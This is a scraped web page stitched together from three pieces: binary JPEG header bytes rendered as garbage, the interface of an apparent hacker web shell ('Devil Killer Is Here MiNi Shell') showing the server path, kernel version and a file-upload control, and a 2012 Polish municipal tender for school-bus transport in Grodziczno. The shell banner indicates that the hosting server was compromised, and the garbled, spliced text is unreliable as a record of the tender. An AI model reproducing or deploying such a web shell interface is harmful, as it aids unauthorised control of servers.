JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/174382-N-2012.html

<p class="kh_header"><b>Grodziczno: Świadczenie usług transportowych uczniów</b><br>
<b>Numer ogłoszenia: 174382 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodziczno , Grodziczno 17A, 13-324 Grodziczno, woj. warmińsko-mazurskie, tel. 056 4729126, faks 056 4729106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych uczniów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych uczniów. 
2.	Usługi transportowe uczniów dotyczą dowozu i odwozu uczniów uczęszczających do gimnazjów i szkół podstawowych na terenie gminy Grodziczno oraz przewozu dzieci i młodzieży szkolnej nie związany z dowozem na zajęcia szkolne.
3.	Szczegółowy wykaz tras dotyczący świadczenia usług transportowych, minimalna ilość miejsc siedzących, które musi mieć pojazd a także liczba dzieci i młodzieży dowożona i odwożona na poszczególnych trasach przedstawia się następująco:

1)	Część 1 przedmiotu zamówienia: świadczenie usług transportowych uczniów - dotyczy Zespołu Szkół w Nowym Grodzicznie i  Szkoły Podstawowej w Zajączkowie.
Środek transportu  - minimum 49 miejsc siedzących 
TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, środa, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Mortęgi		
Wólka		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	49	13,80

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	26	5,80

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	9	5,30

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Mortęgi		
Zajączkowo szkoła		
RAZEM	41	9,30
Odwóz
Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	13,00

Odwóz [przebieg trasy poniedziałek, środa, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30

Odwóz [przebieg trasy poniedziałek, środa, piątek]
	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	13,80

Odwóz [przebieg trasy wtorek, środa, piątek]	Ilość km na trasie
Zajączkowo	
Mortęgi	
Nowe Grodziczno szkoła	
RAZEM	9,30

Odwóz [przebieg trasy wtorek, środa, piątek]	Ilość km na trasie
Zajączkowo	
Mortęgi	
Nowe Grodziczno szkoła	
RAZEM	9,30

Odwóz [przebieg trasy wtorek, środa]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki	
Rynek	
Ostaszewo	
Katlewo	
Białobłoty	
Zwiniarz	
Świniarc	
Tuszewo	
Montowo	
Grodziczno	
Linowiec	
Wólka	
Zajączkowo	
Kuligi	
RAZEM	42,00
TRASA II
Dowóz
Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kuligi		
Zajączkowo wieś		
Zajączkowo pod Jakubkowo		
Zajączkowo wieś		
Mortęgi		
Wólka		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	49	13,80

Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Nowe Grodziczno szkoła		
RAZEM	26	5,80

Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki młyn		
Nowe Grodziczno szkoła		
RAZEM	9	5,30

Dowóz [przebieg trasy wtorek i czwartek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Linowiec		
Mortęgi		
Zajączkowo szkoła		
RAZEM	41	9,30
Odwóz
Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Zajączkowo	
Kuligi	
Zajączkowo	
RAZEM	13,00

Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Lorki młyn	
Nowe Grodziczno szkoła	
RAZEM	5,30

Odwóz [przebieg trasy wtorek i czwartek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Linowiec	
Wólka	
Mortęgi	
Zajączkowo wieś	
Zajączkowo pod Jakubkowo	
Zajączkowo wieś	
Kuligi	
RAZEM	13,80

Odwóz [przebieg trasy poniedziałek i czwartek]	Ilość km na trasie
Zajączkowo	
Mortęgi	
Nowe Grodziczno szkoła	
RAZEM	9,30

2)	Część 2 przedmiotu zamówienia: świadczenie usług transportowych uczniów - dotyczy Zespołu Szkół w Nowym Grodzicznie i Szkoły Podstawowej w Montowie
Środek transportu  - minimum 61 miejsc siedzących 
TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Rynek przystanek PKS		
Rynek szkoła		
Rynek skrzyżowanie		
Ostaszewo centrum turystyczne		
Ostaszewo Rubalewski		
Katlewo skrzyżowanie		
Grodziczno Firański		
Nowe Grodziczno szkoła		
RAZEM	61	11,00

Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Lorki skrzyżowanie		
Lorki wieś		
Nowe Grodziczno Góralski		
Nowe Grodziczno szkoła		
RAZEM	25	10,50

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Nowe Grodziczno szkoła		
Katlewo PGR		
Montowo dworzec PKP		
Montowo szkoła		
RAZEM	27	8,80

Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Montowo szkoła		
(droga żwirówka) Linowiec Karbowski		
Linowiec wiadukt		
Linowiec Seweryn		
Montowo Komoszyński		
Montowo figura		
Montowo szkoła		
RAZEM	18	10,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Ostaszewo centrum turystyczne	
Ostaszewo Rubalewski	
Katlewo skrzyżowanie	
RAZEM	18,00

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec wiadukt	
Linowiec Seweryn	
Montowo Komoszyński	
Montowo figura	
Montowo dworzec PKP	
Katlewo PGR	
RAZEM	11,70

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Nowe Grodziczno szkoła	
Nowe Grodziczno Góralski	
Lorki wieś	
Lorki skrzyżowanie I	
Lorki skrzyżowanie II	
Rynek przystanek PKS	
Rynek szkoła	
Rynek skrzyżowanie	
Ostaszewo centrum turystyczne	
Ostaszewo Rubalewski	
Katlewo skrzyżowanie	
RAZEM	18,00

Odwóz [przebieg trasy poniedziałek, , środa, piątek]	Ilość km na trasie
Montowo szkoła	
(droga żwirówka) Linowiec Karbowski	
Linowiec wiadukt	
Linowiec Seweryn	
Montowo Komoszyński	
Montowo figura	
Montowo dworzec PKP	
Katlewo PGR	
RAZEM	11,70

3)	Część 3 przedmiotu zamówienia: świadczenie usług transportowych uczniów - dotyczy Zespołu Szkół w Mrocznie
Środek transportu  - minimum 49 miejsc siedzących 

TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczno szkoła		
Mroczno góry		
Mroczno szkoła		
RAZEM	15	18,20
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Mroczenko PKS wieś		
Mroczenko koło Dudulskiego		
Mroczenko koło jeziora		
Mroczno szkoła		
RAZEM	49	5,00
Odwóz 
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20

Odwóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20

Odwóz [przebieg trasy  środa]	Ilość km na trasie
Mroczno szkoła	
Mroczenko koło jeziora	
Mroczenko koło Dudulskiego	
Mroczenko PKS wieś	
Mroczno góry	
Mroczno szkoła	
RAZEM	18,20

TRASA II
Dowóz
Dowóz [przebieg trasy  poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Sugajenko wieś		
Sugajenko koło Romanowskich		
Sugajenko koło krzyża		
Wybudowanie pod Sugajno		
Mroczno		
Mroczno szkoła		
RAZEM	36	13,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło krzyża	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło krzyża	
Sugajenko koło krzyża	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	10,50

Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno	
Wybudowanie pod Sugajno	
Sugajenko koło krzyża	
Sugajenko koło Romanowskich	
Sugajenko wieś	
RAZEM	13,00

4)	Część 4 przedmiotu zamówienia: świadczenie usług transportowych uczniów - dotyczy Zespołu Szkół w Mrocznie
Środek transportu  - minimum 27 miejsc siedzących 

TRASA I
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Kowaliki PKS		
Boleszyn		
Mroczno szkoła		
RAZEM	27	10,40
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40

Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Boleszyn	
Kowaliki PKS	
RAZEM	10,40
TRASA II
Dowóz
Dowóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Liczba uczniów wsiadających na trasie	Ilość km na trasie
Trzcin		
Trzcin koło mostu		
Mroczno koło Sendwickiego		
Mroczno szkoła		
RAZEM	25	10,00
Odwóz
Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00

Odwóz [przebieg trasy poniedziałek, wtorek, środa, czwartek, piątek]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00

Odwóz [przebieg trasy środa]	Ilość km na trasie
Mroczno szkoła	
Mroczno koło Sendwickiego	
Trzcin koło mostu	
Trzcin	
RAZEM	10,00

5)	Część 5 przedmiotu zamówienia: świadczenie usług transportowych uczniów - dotyczy przewozu dzieci i młodzieży szkolnej nie związany z dowozem na zajęcia szkolne
Środek transportu  - minimum 40 miejsc siedzących 
Trasa transportu będzie zlecana każdorazowo według potrzeb Zamawiającego.

4.	W poszczególnych częściach przedmiotu zamówienia obsługiwać będzie jeden pojazd z uwagi na przesunięcia czasowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Określenie przedmiotu: Świadczenie usług transportowych uczniów w części nr 1, nr 2, nr 3, nr 4, nr 5 przedmiotu zamówienia
Wielkość: w wielkości 2% przedmiotu zamówienia
Zakres zamówień uzupełniających: świadczenie usług transportowych w części nr 1, nr 2, nr 3, nr 4, nr 5 przedmiotu zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie zgodnie z Art.45 Prawa zamówień Wadium: 
1)	Na część nr 1w wysokości 3500,00 zł. [słownie: trzy tysiące pięćset złotych 00/100], 
2)	Na część nr 2 w wysokości 3000,00 zł. [słownie: trzy tysiące złotych 00/100], 
3)	Na część nr 3 w wysokości 3200,00 zł. [słownie: trzy tysiące dwieście złotych 00/100],
4)	Na część nr 4 w wysokości 1800,00 zł. [słownie: jeden tysiąc osiemset złotych 00/100], 
5)	Na część nr 5 w wysokości 500,00 zł. [słownie: pięćset złotych 00/100], 
	w terminie do dnia 12.06.2012 roku do godz. 8,30 na konto 
	Bank Polskiej Spółdzielczości S.A. Bank Spółdzielczy Iława O/Grodziczno
	nr 40 8831 1038 2001 0000 0101 0003
	uwzględniając, że w dniu 11.06.2012 roku do godz. 15,00 środki pieniężne muszą znajdować się na koncie Zamawiającego. 

2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1)   pieniądzu
2)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3)   gwarancjach bankowych
4)   gwarancjach ubezpieczeniowych
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późniejszymi zmianami).

3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.

4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
	
5.	Wadium wniesione w innej formie niż pieniądz należy złożyć w formie oryginału w pokoju Nr 5 [Kasa] w siedzibie Zamawiającego, a kserokopię potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty, w przypadku przesłania oferty pocztą lub kurierem oryginał należy złożyć w oddzielnym opakowaniu, a do oferty wpiąć kopię potwierdzoną za zgodność z oryginałem. 
	
6.	Zamawiający przechowa, a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku dla oferty częściowej Nr 1, dla oferty częściowej Nr 2, dla oferty n częściowej Nr 3, dla oferty częściowej Nr 4 i dla oferty częściowej Nr 5 nastąpi poprzez złożenie licencji na wykonanie krajowego transportu drogowego osób  zgodnie  z ustawą  z  dnia  06.09.2001 r .   o   transporcie drogowym   (Dz. U. z  2007 r. Nr 125, poz. 874 z późniejszymi zmianami) ważną na cały okres realizacji przedmiotu zamówienia. 
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku dla oferty częściowej Nr 1, dla oferty częściowej Nr 2, dla oferty częściowej Nr 3, dla oferty częściowej Nr 4 i dla oferty częściowej Nr 5 nastąpi poprzez złożenie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku dla oferty częściowej Nr 1, dla oferty częściowej Nr 2, dla oferty n częściowej Nr 3, dla oferty częściowej Nr 4 i dla oferty częściowej Nr 5  nastąpi poprzez złożenie wykazu niezbędnego do wykonania zamówienia taboru komunikacyjnego w ilości 1 szt. autobusu z podaniem numeru rejestracyjnego, serii i numeru dowodu rejestracyjnego, ilości miejsc w autobusie, roku produkcji oraz daty ważności przeglądu technicznego autobusu, którym dysponuje lub będzie dysponował Wykonawca. 
Przegląd techniczny pojazdu musi być ważny na dzień składania oferty.
Dla oferty częściowej Nr 1 pojazd musi mieć minimum 49 miejsc siedzących, dla oferty częściowej Nr 2 pojazd musi mieć minimum 61 miejsc siedzących, dla oferty n częściowej Nr 3 pojazd musi mieć minimum 49 miejsc siedzących, dla oferty częściowej Nr 4 pojazd musi mieć minimum 27 miejsc siedzących, dla oferty częściowej Nr 5 pojazd musi mieć minimum 40 miejsc siedzących.
Jeżeli w powyższym wykazie wykonawca wskazał środek transportu, którym będzie dysponował, należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia   środka transportu.  
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku dla oferty częściowej Nr 1, dla oferty częściowej Nr 2, dla oferty n częściowej Nr 3, dla oferty częściowej Nr 4 i dla oferty częściowej Nr 5  nastąpi poprzez złożenie oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Kierowca musi posiadać uprawnienia do kierowania pojazdem, którym świadczona jest usługa. Opiekun (osoba opiekująca się uczniami) musi posiadać kwalifikacje pedagogiczne i przeszkolenie z zakresu pierwszej pomocy przedmedycznej.
Zamawiający nie wymaga opiekuna dla części 5 przedmiotu zamówienia.
W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku dla oferty częściowej Nr 1, dla oferty częściowej Nr 2, dla oferty n częściowej Nr 3, dla oferty częściowej Nr 4 i dla oferty częściowej Nr 5 nastąpi poprzez złożenie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.  
Ocena spełnienia  warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

